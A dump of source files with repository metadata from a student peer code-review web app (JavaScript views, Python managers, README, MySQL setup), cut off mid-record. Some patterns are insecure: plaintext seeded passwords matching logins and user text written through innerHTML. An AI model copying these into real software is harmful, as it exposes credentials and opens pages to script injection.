"text": "/**Keeps track of views, add views, switch to a given view.\n* @constructor**/\nclass ViewManager\n{\n\tconstructor()\n\t{\n\t\tthis.views=[];\n\t\tthis.currentView = undefined;\n\n\t\tthis.VIEW = {\n\t\t\tSIGNIN: \"signin\",\n\t\t\tSIGNUP: \"signup\",\n\t\t\tPROFILE: \"profile\",\n\t\t\tASSIGNMENTS_TEACHER: \"assignments-teacher\",\n\t\t\tASSIGNMENTS_STUDENT: \"assignments-student\",\n\t\t\tFEEDBACK: \"feedback\",\n\t\t\tPERFORM_REVIEW_STUDENT: \"perform-review-student\",\n\t\t\tSEE_SUBMISSIONS_STUDENT: \"see-submissions-student\",\n\t\t\tSEE_SUBMISSIONS_TEACHER: \"see-submissions-teacher\",\n\t\t\tSEE_STANDARDS_STUDENT: \"see-standards-student\",\n\t\t\tSEE_STANDARDS_TEACHER: \"see-standards-teacher\",\n\t\t\tCODE_VIEW:\"code-view\"\n\t\t}\n\t}\n\n\t/**@param {View} view**/\n\taddView (view)\n\t{\n\t\tthis.views.push(view);\n\t}\n\n\t/**@param {string} title**/\n\tgoToView (title)\n\t{\n\t\tvar viewFound=false;\n\t\tvar i=0;\n\n\t\twhile(i < this.views.length && !viewFound)\n\t\t{\n\t\t\tif(this.views[i].title===title)\n\t\t\t{\n\t\t\t\tviewFound=true;\n\t\t\t\tthis.nextView = this.views[i];\n\t\t\t}\n\t\t\ti++;\n\t\t}\n\n\t\tif(viewFound)\n\t\t{\n\t\t\tif(this.currentView!==undefined)\n\t\t\t{\n\t\t\t\tconsole.log(\"Change view from:\", this.currentView.title);\n\t\t\t\tthis.currentView.hide();\n\t\t\t}\n\n\t\t\tthis.currentView = this.nextView;\n\t\t\tconsole.log(\"Change view to:\", this.currentView.title);\n\t\t\tthis.currentView.show();\n\t\t}\n\t\telse\n\t\t{\n\t\t\tconsole.log(\"View not found:\", title);\n\t\t}\n\t}\n}\n"
},
{
"alpha_fraction": 0.529978334903717,
"alphanum_fraction": 0.5335901975631714,
"avg_line_length": 32.49193572998047,
"blob_id": "9ff76b89d2547a95b478869be6cabecf0909e199",
"content_id": "7101432be8d54143d9fc219e0f10927872ae798b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4153,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 124,
"path": "/py/planner.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import datetime\n\n#from user_manager import UserManager\nfrom assignments_manager import AssignmentsManager\n#from email_system import EmailSystem\nfrom database_manager import DatabaseManager\n\n\nclass CheckAssignmentStage():\n def __init__(self):\n self.assignments_manager = AssignmentsManager()\n self.database_manager = DatabaseManager()\n\n def update(self):\n #print(\"##########################################\")\n #print(\"DAEMON IS UPDATED\")\n #print(\"##########################################\")\n\n update_clients = False\n\n #Thsi method returns a message pack (type, data). We need data\n assignments = self.assignments_manager.get_assignments()[1]\n for assignment in assignments:\n status = assignment[\"status\"]\n old_status = status\n deadline_string = assignment[\"deadline_date\"] + \"T\" + assignment[\"deadline_time\"]\n review_till_string = assignment[\"review_till_date\"] + \"T\" + assignment[\"review_till_time\"]\n\n deadline_time = datetime.datetime.strptime(deadline_string, '%Y-%m-%dT%H:%M')\n review_till_time = datetime.datetime.strptime(review_till_string, '%Y-%m-%dT%H:%M')\n\n\n if status == \"normal\":\n time_remaining = deadline_time - datetime.datetime.now()\n if time_remaining < datetime.timedelta(hours=1):\n status = \"submission_soon\"\n #SEND EMAIL\n pass\n\n elif status == \"review\":\n time_remaining = review_till_time - datetime.datetime.now()\n if time_remaining < datetime.timedelta(hours=1):\n status = \"review_end_soon\"\n # SEND EMAIL\n pass\n\n elif status == \"submission_soon\":\n time_remaining = deadline_time - datetime.datetime.now()\n if time_remaining < datetime.timedelta(hours=0):\n status = \"review\"\n self.reviewer_assigning(assignment)\n update_clients = True\n # SEND EMAIL\n\n pass\n\n elif status == \"review_end_soon\":\n time_remaining = review_till_time - datetime.datetime.now()\n if time_remaining < datetime.timedelta(hours=0):\n status = \"completed\"\n update_clients = True\n\n\n # SEND EMAIL\n pass\n\n if old_status != status:\n try:\n assignment[\"status\"] = status\n self.database_manager.replace_into_table(\"Assignments\", assignment)\n except:\n pass\n\n return update_clients\n\n\n\n def reviewer_assigning(self, assignment):\n submissions = self.assignments_manager.get_submissions_for_assignment(assignment[\"id\"])\n\n submitters = []\n for submission in submissions:\n submitters.append(submission[\"user_id\"])\n\n total_reviews_to_do = assignment[\"reviewers_amount\"]\n if total_reviews_to_do >= len(submitters):\n total_reviews_to_do = len(submitters) - 1\n #SEND EMAIL\n\n reviewer_ids = []\n for submission in submissions:\n reviewer_ids.append( [ ] )\n\n\n max_clock_offset = len(submissions) - 1\n offset = 1\n\n\n for i in range(0, total_reviews_to_do):\n for j in range(0, len(reviewer_ids)):\n reviewer_ids[j].append(submitters[offset])\n offset += 1\n if offset > max_clock_offset:\n offset = 0\n offset += 1\n if offset > max_clock_offset:\n offset = 0\n\n for i in range(0, len(submissions)):\n submissions[i][\"reviewers_ids\"] = reviewer_ids[i]\n del submissions[i][\"user_data\"]\n\n try:\n self.assignments_manager.submit_assignment(submissions[i])\n #print(\"Updated Submission\")\n except:\n pass\n\n\n\ncheck_time = CheckAssignmentStage()\n\ndef update():\n return check_time.update()\n"
},
{
"alpha_fraction": 0.5866551399230957,
"alphanum_fraction": 0.5875216722488403,
"avg_line_length": 15.485713958740234,
"blob_id": "78325e0aa894bf685cd126305879ecfc5afb1f9b",
"content_id": "a0c20308f03088bf8a4e7cfa54f586942faaa01c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1154,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 70,
"path": "/js/Net.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "///**class Net**/\nclass Net\n{\n\tconstructor()\n\t{\n\t\tthis.host = \"\";\n\t\tthis.port = \"\";\n\t\tthis.messageHandler = new MessageHandler();\n\t}\n\n\tsetHost (ip, port)\n\t{\n\t\tthis.host = ip;\n\t\tthis.port = port;\n\t}\n\n\tconnect ()\n\t{\n\t\tvar that = this;\n\t\tthis.ws = new WebSocket(\"ws://\"+this.host+\":\"+this.port+\"/GCodeReviewer\");\n\n\t\tthis.ws.onopen = function()\n\t\t{\n\n\t\t};\n\n\t\tthis.ws.onmessage = function (evt)\n\t\t{\n\t\t \tthat.messageHandler.handleMessage(evt.data);\n\t\t};\n\n\t\tthis.ws.onclose = function()\n\t\t{\n\t\t\tconsole.log(\"ws closed\");\n\t\t};\n\t}\n\n\tsendMessage (type, data)\n\t{\n\t\tconsole.log(\"in net.js\");\n\t\tconsole.log(type, data);\n\t\tvar msg = {};\n\t\tmsg.data = data;\n\t\tmsg.type = type;\n\n\t\tvar m = JSON.stringify(msg);\n\t\tconsole.log(m);\n\t\tm = JSON.parse(m);\n\t\tconsole.log(m);\n\t\tthis.ws.send(JSON.stringify(msg));\n\t}\n\n\t/**this method is mostly used to talk with the server.**/\n\tXHR (type, url, callback, params)\n\t{\n\t\tvar xhr = new XMLHttpRequest();\n\t\txhr.onreadystatechange = function()\n\t\t{\n\t\t if (xhr.readyState === 4)\n\t\t\t{\n\t\t \tcallback(xhr.responseText);\n\t\t }\n\t\t};\n\t\txhr.open(type, url, true);\n\t\tif(params === undefined){\n\t\t\tparams = null;\n\t\t}\n\t\txhr.send(params);\n\t};\n}\n"
},
{
"alpha_fraction": 0.5261239409446716,
"alphanum_fraction": 0.5281490683555603,
"avg_line_length": 26.433332443237305,
"blob_id": "c0359652e93d535ae792c9c5602faf79d0c86dc0",
"content_id": "e3381f4f9a37d69d783e4e43fca0c427e43fb634",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2469,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 90,
"path": "/js/Assignments.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Assignments extends Model\n{\n constructor()\n {\n super();\n this.assignments = [];\n }\n\n\n update(data, messageType)\n {\n if (data !== \"\" && !Number.isInteger(data))\n {\n if ( messageType === net.messageHandler.types.TEACHER_ASSIGNMENTS_CREATION_SUCCESSFUL ||\n messageType === net.messageHandler.types.GET_ASSIGNMENTS_SUCCESSFUL ||\n messageType === net.messageHandler.types.ASSIGNMENT_DELETE_SUCCESSFUL)\n {\n this.assignments = [];\n for (var i = 0; i < data.length; i++)\n {\n this.assignments.push( new Assignment(data[i]));\n }\n }\n }\n\n // updates views\n this.notify(messageType);\n }\n\n createAssignment(name, deadlineTime, deadlineDate,reviewTillTime, reviewTillDate, description, reviewersAmount)\n {\n var data = {};\n data.name = name;\n data.deadline_time = deadlineTime;\n data.deadline_date = deadlineDate;\n data.description = description;\n data.review_till_date = reviewTillDate;\n data.review_till_time = reviewTillTime;\n data.reviewers_amount = reviewersAmount;\n data.status = \"normal\";\n\n\n net.sendMessage(\"add_assignment\", data);\n }\n\n getAllAssignment()\n {\n net.sendMessage(\"get_assignments\", {});\n }\n\n deleteAssignment(id)\n {\n net.sendMessage(\"delete_assignment\", {\"id\":id});\n }\n\n submitAssignment(assignmentID, filesSubmitted)\n {\n var data = app.submissions.getIfSubmitted( assignmentID, app.user.id);\n\n if (Object.keys(data).length === 0)\n {\n data.user_id = app.user.id;\n data.assignment_id = assignmentID;\n data.submission_data = filesSubmitted;\n data.is_complete = 0;\n\n data.iteration = 1;\n data.reviewers_ids = [];\n data.feedbacks = [];\n }\n\n else\n {\n for (var i = 0; i < this.assignments.length; i++)\n {\n if (this.assignments[i].id === assignmentID && (this.assignments[i].status === \"review\" || this.assignments[i].status === \"review_end_soon\" ))\n {\n data.iteration++;\n }\n\n }\n\n\n data.submission_data = filesSubmitted;\n }\n\n\n net.sendMessage(\"submit_assignment\", data);\n }\n}\n"
},
{
"alpha_fraction": 0.6816245317459106,
"alphanum_fraction": 0.683470606803894,
"avg_line_length": 23.36678123474121,
"blob_id": "a3198176006055d5f4b4f325d2e9cf713219d34a",
"content_id": "fd80245ab4d6e11972e10ff65c8012da4ff122de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7045,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 289,
"path": "/py/assignments_manager.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "from database_manager import DatabaseManager\nfrom email_system import EmailSystem\nfrom bs4 import BeautifulSoup\nimport requests\nimport random\nimport json\n\n\n\nclass AssignmentsManager:\n\tdef __init__(self):\n\t\tprint(\"AssignmentsManager: __init__\")\n\t\tself.database_manager = DatabaseManager()\n\t\tself.email_system = EmailSystem()\n\n\n\tdef add_assignment(self, message_data):\n\t\tprint(\"add_assignment\")\n\t\ttype = \"teacher_assignments_creation_successful\"\n\t\tdata = {}\n\n\t\ttry:\n\t\t\tpass\n\t\t\tself.database_manager.insert_into_table(\"Assignments\", message_data)\n\t\t\tprint(\"Added Assignment Successfully\")\n\t\texcept:\n\t\t\ttype = \"teacher_assignments_creation_failed\"\n\t\t\tprint(\"Added Assignment Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\tdef delete_assignment(self, id):\n\t\ttype = \"assignment_delete_successful\"\n\t\tdata = {}\n\n\t\ttry:\n\t\t\tpass\n\t\t\tself.database_manager.delete_assignment(id)\n\t\t\tprint(\"Deleted Assignment Successfully\")\n\t\texcept:\n\t\t\ttype = \"assignment_delete_failed\"\n\t\t\tprint(\"Deleted Assignment Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\n\tdef get_assignments(self):\n\t\tprint(\"get_assignment\")\n\t\ttype = \"get_assignments_successful\"\n\t\tdata = {}\n\n\t\ttry:\n\t\t\tdata = self.database_manager.select_all_from_table(\"Assignments\")\n\t\t\tprint(\"Retrieved Assignments Successfully\")\n\t\texcept:\n\t\t\ttype = \"get_assignments_failed\"\n\t\t\tprint(\"Added Assignment Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\n\tdef submit_assignment(self, message_data):\n\t\tprint(\"submit_assignment\")\n\t\ttype = \"submit_assignment_successful\"\n\t\tdata = []\n\n\t\ttry:\n\n\t\t\tsubmission_data = json.dumps(message_data[\"submission_data\"])\n\t\t\tmessage_data[\"submission_data\"] = submission_data\n\n\t\t\treviewers_ids = json.dumps(message_data[\"reviewers_ids\"])\n\t\t\tmessage_data[\"reviewers_ids\"] = reviewers_ids\n\n\t\t\tfeedbacks = json.dumps(message_data[\"feedbacks\"])\n\t\t\tmessage_data[\"feedbacks\"] = feedbacks\n\n\t\t\tself.database_manager.replace_into_table(\"Submissions\", message_data)\n\t\t\tprint(\"Submitted Assignment Successfully\")\n\n\t\texcept:\n\t\t\ttype = \"submit_assignment_failed\"\n\t\t\tprint(\"Submitted Assignment Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\tdef get_submissions(self, user_id):\n\t\tprint(\"get_submissions\")\n\t\ttype = \"get_submissions_successful\"\n\t\tdata = []\n\n\t\t#try:\n\t\tsubmissions = self.database_manager.select_all_from_table(\"Submissions\")\n\t\tusers = self.database_manager.select_all_from_table(\"Users\")\n\n\t\t# these include a.Personal submissions and b.Submission to review.\n\t\tactual_submissions = []\n\n\t\tfor submission in submissions:\n\n\t\t\t#if it is our submission - we grab it\n\t\t\tif submission[\"user_id\"] == user_id:\n\t\t\t\tactual_submissions.append(submission)\n\n\t\t\tsubmission_data = json.loads(submission[\"submission_data\"])\n\t\t\tsubmission[\"submission_data\"] = submission_data\n\n\t\t\treviewers_ids = json.loads(submission[\"reviewers_ids\"])\n\n\t\t\tif len(reviewers_ids) > 0:\n\t\t\t\tfor i in range(0, len(reviewers_ids)):\n\t\t\t\t\tfor user in users:\n\t\t\t\t\t\tif user[\"id\"] == reviewers_ids[i]:\n\t\t\t\t\t\t\treviewers_ids[i] = user\n\n\t\t\t\t\t# if user requesting submissions is mentioned as a reviewer - we grab the submission\n\t\t\t\t\tif reviewers_ids[i][\"id\"] == user_id:\n\t\t\t\t\t\tactual_submissions.append(submission)\n\n\n\t\t\tsubmission[\"reviewers_ids\"] = reviewers_ids\n\n\t\t\tfeedbacks = json.loads(submission[\"feedbacks\"])\n\t\t\tsubmission[\"feedbacks\"] = feedbacks\n\n\n\n\n\t\tdata = actual_submissions\n\n\t\tprint(\"Get Submissions Successfully\")\n\t\t#except:\n\t\t#\ttype = \"get_submissions_failed\"\n\t\t#\tprint(\"Get Submissions Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\tdef get_all_submissions(self):\n\t\tprint(\"get_all_submissions\")\n\t\ttype = \"get_submissions_successful\"\n\t\tdata = []\n\n\t\ttry:\n\t\t\tsubmissions = self.database_manager.select_all_from_table(\"Submissions\")\n\t\t\tusers = self.database_manager.select_all_from_table(\"Users\")\n\n\t\t\tfor submission in submissions:\n\t\t\t\tsubmission_data = json.loads(submission[\"submission_data\"])\n\t\t\t\tsubmission[\"submission_data\"] = submission_data\n\n\t\t\t\treviewers_ids = json.loads(submission[\"reviewers_ids\"])\n\n\t\t\t\tif len(reviewers_ids) > 0:\n\t\t\t\t\tfor i in range(0, len(reviewers_ids)):\n\t\t\t\t\t\tfor user in users:\n\t\t\t\t\t\t\tif user[\"id\"] == reviewers_ids[i]:\n\t\t\t\t\t\t\t\treviewers_ids[i] = user\n\t\t\t\tsubmission[\"reviewers_ids\"] = reviewers_ids\n\n\n\t\t\t\tfeedbacks = json.loads(submission[\"feedbacks\"])\n\t\t\t\tsubmission[\"feedbacks\"] = feedbacks\n\n\n\n\t\t\t\tfor user in users:\n\t\t\t\t\tif user[\"id\"] == submission[\"user_id\"]:\n\t\t\t\t\t\tsubmission[\"user_data\"] = user\n\n\t\t\tdata = submissions\n\n\t\t\tprint(\"Get All Submissions Successfully\")\n\t\texcept:\n\t\t\ttype = \"get_submissions_failed\"\n\t\t\tprint(\"Get all Submissions Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\n\n\tdef get_submissions_for_assignment(self,assignment_id):\n\t\tall_submissions = self.get_all_submissions()[1]\n\t\tsubmissions = []\n\t\tfor submission in all_submissions:\n\t\t\tif submission[\"assignment_id\"] == assignment_id:\n\t\t\t\tsubmissions.append(submission)\n\n\t\treturn submissions\n\n\n\n\tdef submit_review(self, message_data):\n\t\tprint(\"submit_review\")\n\t\ttype = \"submit_review_successful\"\n\n\t\tnew_review = message_data[\"new_review\"]\n\t\tdel message_data[\"new_review\"]\n\n\t\tdata = []\n\n\t\ttry:\n\t\t\tif new_review:\n\t\t\t\tself.database_manager.add_review(message_data)\n\t\t\t\tprint(\"Submitted New Review Successfully\")\n\t\t\telse:\n\t\t\t\tself.database_manager.update_review(message_data)\n\t\t\t\tprint(\"Submitted Updated Review Successfully\")\n\n\t\texcept:\n\t\t\ttype = \"submit_review_failed\"\n\t\t\tprint(\"Submit Review Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\n\tdef push_standard(self, message_data):\n\t\tprint(\"push_standard\")\n\t\ttype = \"submit_review_successful\"\n\t\tdata = {}\n\n\t\tskip_title_h1 = True\n\n\t\thtml_content = message_data[\"html_content\"]\n\t\tsoup = BeautifulSoup(html_content, 'html.parser')\n\t\tnode_list = soup.find_all([\"h1\", \"h2\"])\n\n\t\tstandards = []\n\t\tstandard_bit = {}\n\n\t\tfor n in node_list:\n\t\t\tif n.get_text() == \"\":\n\t\t\t\tcontinue\n\n\t\t\tif n.name == \"h1\":\n\t\t\t\tif skip_title_h1:\n\t\t\t\t\tskip_title_h1 = False\n\t\t\t\t\tcontinue\n\t\t\t\tstandard_bit[\"category\"] = n.get_text().rstrip()\n\n\t\t\tif n.name == \"h2\":\n\t\t\t\tstandard_bit[\"sub_category\"] = n.get_text().rstrip()\n\t\t\t\tstandard_bit[\"description\"] = \"\"\n\t\t\t\tfor elem in n.next_siblings:\n\t\t\t\t\tif elem.name == 'p':\n\t\t\t\t\t\tif elem.get_text() != \"\":\n\t\t\t\t\t\t\tdescription = elem.get_text()\n\t\t\t\t\t\t\tdescription.replace(\"┬а\", \" \")\n\t\t\t\t\t\t\tstandard_bit[\"description\"] += description + \"<br>\"\n\n\t\t\t\t\tif elem.name and elem.name.startswith('h'):\n\t\t\t\t\t\tcategory = standard_bit[\"category\"]\n\t\t\t\t\t\tstandards.append(standard_bit)\n\t\t\t\t\t\tstandard_bit = {\"category\":category}\n\t\t\t\t\t\tbreak\n\n\t\ttry:\n\t\t\tfor standard in standards:\n\t\t\t\tself.database_manager.replace_into_table(\"Standards\", standard)\n\t\t\tprint(\"Submitted Standard Successfully\")\n\n\n\t\texcept:\n\t\t\ttype = \"submit_review_failed\"\n\t\t\tpass\n\n\t\tmessage = [type, standards]\n\t\treturn message\n\n\tdef get_standard(self):\n\t\tprint(\"get_standard\")\n\t\ttype = \"get_standard_successful\"\n\t\tdata = []\n\n\t\ttry:\n\t\t\tdata = self.database_manager.select_all_from_table(\"Standards\")\n\t\t\tprint(\"Get All Standards Successfully\")\n\t\texcept:\n\t\t\ttype = \"get_standard_failed\"\n\t\t\tprint(\"Get All Standards Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n"
},
{
"alpha_fraction": 0.648876428604126,
"alphanum_fraction": 0.658707857131958,
"avg_line_length": 24.657657623291016,
"blob_id": "9756b3a46ca099b0d5094bca87f1112fe4ce5496",
"content_id": "ef163dcc34622f7b846485be2cb36e6806a5c622",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2848,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 111,
"path": "/views/assignments-teacher/AssignmentsTeacherView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass AssignmentsTeacherView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.ASSIGNMENTS_TEACHER;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\t}\n\n\tonNotify (model, messageType)\n\t{\n\t\tvar view = this;\n\n\t\t// Update the table of assessments\n\t\tif (messageType === net.messageHandler.types.TEACHER_ASSIGNMENTS_CREATION_SUCCESSFUL ||\n\t\t\tmessageType === net.messageHandler.types.GET_ASSIGNMENTS_SUCCESSFUL ||\n\t\t\tmessageType === net.messageHandler.types.ASSIGNMENT_DELETE_SUCCESSFUL )\n\t\t{\n\t\t\tvar assignmentTable = document.getElementById(\"teacher-assignments-table\");\n\n\t\t\t// remove all data in there.\n\t\t\tvar rowCount = assignmentTable.rows.length;\n\t\t\twhile(--rowCount)\n\t\t\t{\n\t\t\t\tassignmentTable.deleteRow(rowCount);\n\t\t\t}\n\n\t\t\tvar assignments = model.assignments;\n\n\t\t\tfor (var i = 0; i < assignments.length; i++)\n\t\t\t{\n\t\t\t\tvar row = assignmentTable.insertRow(i + 1);\n\n\n\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\tvar cell1 = row.insertCell(1);\n\t\t\t\tvar cell2 = row.insertCell(2);\n\t\t\t\tvar cell3 = row.insertCell(3);\n\t\t\t\tvar cell4 = row.insertCell(4);\n\t\t\t\tvar cell5 = row.insertCell(5);\n\n\n\t\t\t\tvar img = document.createElement(\"IMG\");\n\t\t\t\timg.src = \"resources/images/trash-button.png\";\n\t\t\t\timg.id = \"delete-assignment-button##\" + assignments[i].id;\n\t\t\t\timg.className = \"picture-button\";\n\t\t\t\timg.addEventListener(\"click\", function()\n\t\t\t\t{\n\t\t\t\t\tvar id = parseInt(this.id.split('##')[1]);\n\t\t\t\t\tview.controller.deleteAssignment(id);\n\t\t\t\t});\n\t\t\t\tcell0.appendChild(img);\n\n\n\t\t\t\tcell1.innerHTML = assignments[i].name;\n\t\t\t\tcell2.innerHTML = assignments[i].description;\n\t\t\t\tcell3.innerHTML = assignments[i].reviewTillDate;\n\t\t\t\tcell4.innerHTML = assignments[i].reviewTillTime;\n\n\t\t\t\tvar status = assignments[i].status;\n\n\t\t\t\tif (status === \"normal\") {\n\t\t\t\t\tstatus = \"Normal\";\n\t\t\t\t}\n\t\t\t\telse if (status === \"submission_soon\") {\n\t\t\t\t\tstatus = \"Submissions Due Soon\";\n\t\t\t\t}\n\t\t\t\telse if (status === \"review\") {\n\t\t\t\t\tstatus = \"Review Time\";\n\t\t\t\t}\n\t\t\t\telse if (status === \"review_end_soon\") {\n\t\t\t\t\tstatus = \"Reviewing Ends Soon\";\n\t\t\t\t}\n\t\t\t\telse if (status === \"completed\") {\n\t\t\t\t\tstatus = \"Completed\";\n\t\t\t\t}\n\n\n\n\t\t\t\tcell5.innerHTML = status;\n\t\t\t}\n\n\t\t\t// Add one more, where you can add a new assignment\n\t\t\tvar emptyRow = assignmentTable.insertRow(assignments.length + 1);\n\t\t\tvar iconCell = emptyRow.insertCell(0);\n\t\t\temptyRow.insertCell(1);\n\t\t\temptyRow.insertCell(2);\n\t\t\temptyRow.insertCell(3);\n\t\t\temptyRow.insertCell(4);\n\t\t\temptyRow.insertCell(5);\n\n\t\t\tvar img = document.createElement(\"IMG\");\n\t\t\timg.src = \"resources/images/plus-button.png\";\n\t\t\timg.id = \"add-assignment-button\";\n\t\t\timg.className = \"picture-button\";\n\t\t\timg.addEventListener(\"click\", function()\n\t\t\t{\n\t\t\t\tview.controller.createAddAssignmentModal();\n\t\t\t});\n\t\t\ticonCell.appendChild(img);\n\t\t}\n\t}\n\n\tshow()\n\t{\n\t\tsuper.show();\n\t}\n}\n"
},
{
"alpha_fraction": 0.7206266522407532,
"alphanum_fraction": 0.7223672866821289,
"avg_line_length": 20.679244995117188,
"blob_id": "b074376652054756450e9e5bf5f1bc6dfa8b91cd",
"content_id": "32363e8c4583a066514819f046178dc2e213f968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1149,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 53,
"path": "/README.md",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "This is a gamified verison of Mihass Project a.k.a Ankylo\n\nIt uses Docker to provide portability, so you do not need to have MySQL or Python to start it up. First you need to build a Python Server from the root folder:\n\n$ docker build -t python-server -f Docker/ServerDockerfile .\n\nTo deploy and launch this project, run following commands.\n\n$ cd Docker\n$ docker-compose build\n$ docker-compose up\n\nThen go to http://localhost/gs/ (if you use Docker for Windows/MacOS) or an IP stated when you start docker-toolbox.\n\nTo stop docker:\n\n# cd Docker\n# docker-compose stop\n\n\nFeatures Completed:\n-Signin\n-Signup\n\n\nTo Do:\n-Navigation Bar***\n-Submit Assignment\n -Selector***\n -Submission Window (1)***\n-Submit Review\n -Select Mode*\n -Review Mode (3 + spike)***\n\n-Read Feedback**\n-Review Selector**\n-Space Game*\n-View Review**\n-Profile\n -Skill Window\n -Statistics\n\n\n-Teacher System side\n -Add New Standards**\n -Add/Modify Assignment**\n -Review Assignment*\n\n- Sample code\n//Create a modal\nvar modalData = app.uiFactory.createModal(\"id\", \"title\");\ndocument.body.appendChild(modalData.modal);\nmodalData.modal.style.display = \"block\";\n"
},
{
"alpha_fraction": 0.6665172576904297,
"alphanum_fraction": 0.6844464540481567,
"avg_line_length": 33.32307815551758,
"blob_id": "ddf7360dff3fb04db514732cf28147fe4c137a0e",
"content_id": "550a6f543b424568413b341c9a23f21d2bf1a46f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 2231,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 65,
"path": "/Docker/MySQL/setup.sql",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "CREATE DATABASE IF NOT EXISTS ProjectOrganiser;\nUSE ProjectOrganiser;\n\n-- Table `ProjectOrganiser`.`Users`\nCREATE TABLE IF NOT EXISTS `ProjectOrganiser`.`Users` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `email` VARCHAR(255) NOT NULL,\n `name` VARCHAR(45) NOT NULL,\n `surname` VARCHAR(45) NOT NULL,\n `team_name` VARCHAR(45) NOT NULL,\n `noun` VARCHAR(45) NOT NULL,\n `password` VARCHAR(32) NOT NULL,\n `role` VARCHAR(32) NOT NULL,\n `logs` MEDIUMTEXT,\n PRIMARY KEY (`id`));\n\nCREATE UNIQUE INDEX `email_UNIQUE` ON `ProjectOrganiser`.`Users` (`email` ASC);\n\n-- creating dummy teacher\n\nINSERT INTO ProjectOrganiser.Users (email, team_name, name, surname, noun, password, role)\nVALUES ('q','teacher','John','Doe','Potato','q','teacher'),\n ('w','1','w','w','Bed','w','student'),\n ('e','1','e','e','Chair','e','student'),\n ('r','2','r','r','Pizza','r','student'),\n ('t','2','t','t','Grass','t','student');\n\n\n-- Table `ProjectOrganiser`.`Assignments`\nCREATE TABLE IF NOT EXISTS `ProjectOrganiser`.`Assignments` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `name` VARCHAR(63) NOT NULL,\n `deadline_date` VARCHAR(16) NOT NULL,\n `deadline_time` VARCHAR(16) NOT NULL,\n `review_till_date` VARCHAR(16) NOT NULL,\n `review_till_time` VARCHAR(16) NOT NULL,\n `reviewers_amount` INT NOT NULL,\n `status` VARCHAR(32) NOT NULL,\n `description` VARCHAR(255) NOT NULL,\n\n PRIMARY KEY (`id`));\n\nCREATE UNIQUE INDEX `deadline_date_UNIQUE` ON `ProjectOrganiser`.`Assignments` (`name` ASC);\n\n-- Table `ProjectOrganiser`.`Submissions`\nCREATE TABLE IF NOT EXISTS `ProjectOrganiser`.`Submissions` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `user_id` INT NOT NULL,\n `assignment_id` INT NOT NULL,\n `submission_data` MEDIUMTEXT NOT NULL,\n `is_complete` INT NOT NULL,\n `iteration` INT NOT NULL,\n `reviewers_ids` MEDIUMTEXT,\n `feedbacks` MEDIUMTEXT,\n PRIMARY KEY (`id`, `user_id`, `assignment_id`));\n\n-- Table `ProjectOrganiser`.`Standards`\nCREATE TABLE IF NOT EXISTS `ProjectOrganiser`.`Standards` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `category` VARCHAR(255),\n `sub_category` VARCHAR(255),\n `description` MEDIUMTEXT,\n PRIMARY KEY (`id`));\n\nCREATE UNIQUE INDEX `deadline_date_UNIQUE` ON `ProjectOrganiser`.`Standards` (`category`, `sub_category` ASC);\n"
},
{
"alpha_fraction": 0.6402713060379028,
"alphanum_fraction": 0.6441206336021423,
"avg_line_length": 24.02522850036621,
"blob_id": "6a5dc2a2c80fe5f53a3ad0046abefd2368c5baed",
"content_id": "eaac1c6e886d7c9487645dc6a06baefafc5cd328",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 10911,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 436,
"path": "/views/feedback/FeedbackView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
